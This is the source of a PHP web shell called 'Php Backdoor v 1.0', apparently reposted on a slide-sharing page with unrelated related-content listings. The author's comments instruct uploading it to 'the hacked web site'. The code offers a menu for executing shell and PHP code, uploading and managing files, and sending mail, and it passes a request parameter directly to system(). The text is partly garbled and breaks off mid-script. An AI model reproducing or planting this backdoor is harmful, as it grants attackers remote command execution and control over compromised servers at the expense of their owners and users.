// ################################ // Php Backdoor v 1.0 by ^Jerem // 
################################ // ################################ // This backdoor coded 
in php allows // allows to control a web serv ... // For use this script upload this // on the ftp server of the 
hacked // web site. Enjoy ^^ // ################################ // 
################################ // Author: ^Jerem // Mail: jerem@x-perience.org // Web: 
http://www.x-perience.org // ################################ echo ''; echo ''; echo ''; echo ''; echo 
''; echo ' 
Php Backdoor v 1.0 by ^Jerem 
'; echo ' 
'; echo ' 
'; echo 'Backdoor option list: 
'; echo '• Backdoor index 
'; echo '• Execute a shell code 
'; echo '• Execute a php code 
'; echo '• Files Management 
'; echo '• Upload a file 
'; echo '• Files listing 
'; echo '• Send a Email 
'; echo '• Infos serv'; if ($action == "shell") { echo ' 
######################### 
'; echo 'Enter shell code to execute: '; echo ' 
'; //echo ' '; echo ' 
'; echo ' 
'; } elseif ($action == "shellgo") { echo ' 
######################### 
'; $cmd = stripslashes($cmd); echo 'The shell code '.$cmd.' as been executed on 
server. 
'; echo 'The server with answered this your request: 
'; system($cmd); } else if ($action == "mail") { echo ' 
######################### 
'; echo ' 
Execute

More Related Content

PDF
Firefox OS : Designing Khmer Keyboard and Fonts
PDF
VDay 2015 - Golang as the Dream of a Devops Engineer
KEY
Why do we use ZF?
PPTX
Robust Web APIs with node.js and Express
PDF
Desert Code Camp 2014: C#, the best programming language
PDF
High performance web server
DOC
Shellasd
PDF
Art of Web Backdoor - Pichaya Morimoto
Firefox OS : Designing Khmer Keyboard and Fonts
VDay 2015 - Golang as the Dream of a Devops Engineer
Why do we use ZF?
Robust Web APIs with node.js and Express
Desert Code Camp 2014: C#, the best programming language
High performance web server
Shellasd
Art of Web Backdoor - Pichaya Morimoto

Similar to Shellasdasd (20)

TXT
Fisier.txt
TXT
TXT
C99
TXT
C99
TXT
C99[2]
TXT
My shell
PDF
HTTP For the Good or the Bad
PDF
Php web backdoor obfuscation
PDF
Anatomy of PHP Shells
TXT
DOC
How to send files to remote server via ssh in php
PDF
PHP Backdoor: The rise of the vuln
TXT
C99.php
TXT
PDF
Apache and PHP: Why httpd.conf is your new BFF!
DOCX
Web-servers & Application Hacking
PPTX
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
PPTX
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
TXT
Yy
TXT
Yy
Fisier.txt
C99
C99
C99[2]
My shell
HTTP For the Good or the Bad
Php web backdoor obfuscation
Anatomy of PHP Shells
How to send files to remote server via ssh in php
PHP Backdoor: The rise of the vuln
C99.php
Apache and PHP: Why httpd.conf is your new BFF!
Web-servers & Application Hacking
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
CONFidence 2018: Attacking web servers via run time configuration (Eldar "Wir...
Yy
Yy
Ad

Recently uploaded (20)

PPTX
Newer Technologies in medical field.pptx
PDF
Essentials of Hysteroscopy at World Laparoscopy Hospital
PPTX
Obstetric management in women with epilepsy.pptx
PDF
health promotion and maintenance of elderly
PDF
Zuri Health Pan-African Digital Health Innovator.pdf
PPTX
Arthritis Types, Signs & Treatment with physiotherapy management
PDF
Culturally Sensitive Health Solutions: Engineering Localized Practices (www....
PPTX
GCP GUIDELINES 2025 mmch workshop .pptx
PPTX
POSTURE.pptx......,............. .........
PPTX
guidance--unit 1 semester-5 bsc nursing.
PDF
Medical_Biology_and_Genetics_Current_Studies_I.pdf
PPT
Pyramid Points Lab Values Power Point(11).ppt
PPTX
Understanding The Self : 1Sexual health
PPT
12.08.2025 Dr. Amrita Ghosh_Stocks Standards_ Smart_Inventory Management_GCLP...
PPTX
Acute renal failure.pptx for BNs 2nd year
PPTX
Nancy Caroline Emergency Paramedic Chapter 16
PPTX
Nancy Caroline Emergency Paramedic Chapter 17
PPTX
Nancy Caroline Emergency Paramedic Chapter 1
PPTX
HIGHLIGHTS of NDCT 2019 WITH IMPACT ON CLINICAL RESEARCH.pptx
PDF
Introduction to Clinical Psychology, 4th Edition by John Hunsley Test Bank.pdf
Newer Technologies in medical field.pptx
Essentials of Hysteroscopy at World Laparoscopy Hospital
Obstetric management in women with epilepsy.pptx
health promotion and maintenance of elderly
Zuri Health Pan-African Digital Health Innovator.pdf
Arthritis Types, Signs & Treatment with physiotherapy management
Culturally Sensitive Health Solutions: Engineering Localized Practices (www....
GCP GUIDELINES 2025 mmch workshop .pptx
POSTURE.pptx......,............. .........
guidance--unit 1 semester-5 bsc nursing.
Medical_Biology_and_Genetics_Current_Studies_I.pdf
Pyramid Points Lab Values Power Point(11).ppt
Understanding The Self : 1Sexual health
12.08.2025 Dr. Amrita Ghosh_Stocks Standards_ Smart_Inventory Management_GCLP...
Acute renal failure.pptx for BNs 2nd year
Nancy Caroline Emergency Paramedic Chapter 16
Nancy Caroline Emergency Paramedic Chapter 17
Nancy Caroline Emergency Paramedic Chapter 1
HIGHLIGHTS of NDCT 2019 WITH IMPACT ON CLINICAL RESEARCH.pptx
Introduction to Clinical Psychology, 4th Edition by John Hunsley Test Bank.pdf
Ad

Shellasdasd

  • 1. // ################################ // Php Backdoor v 1.0 by ^Jerem // ################################ // ################################ // This backdoor coded in php allows // allows to control a web serv ... // For use this script upload this // on the ftp server of the hacked // web site. Enjoy ^^ // ################################ // ################################ // Author: ^Jerem // Mail: jerem@x-perience.org // Web: http://www.x-perience.org // ################################ echo ''; echo ''; echo ''; echo ''; echo ''; echo ' Php Backdoor v 1.0 by ^Jerem '; echo ' '; echo ' '; echo 'Backdoor option list: '; echo '• Backdoor index '; echo '• Execute a shell code '; echo '• Execute a php code '; echo '• Files Management '; echo '• Upload a file '; echo '• Files listing '; echo '• Send a Email '; echo '• Infos serv'; if ($action == "shell") { echo ' ######################### '; echo 'Enter shell code to execute: '; echo ' '; //echo ' '; echo ' '; echo ' '; } elseif ($action == "shellgo") { echo ' ######################### '; $cmd = stripslashes($cmd); echo 'The shell code '.$cmd.' as been executed on server. '; echo 'The server with answered this your request: '; system($cmd); } else if ($action == "mail") { echo ' ######################### '; echo ' Execute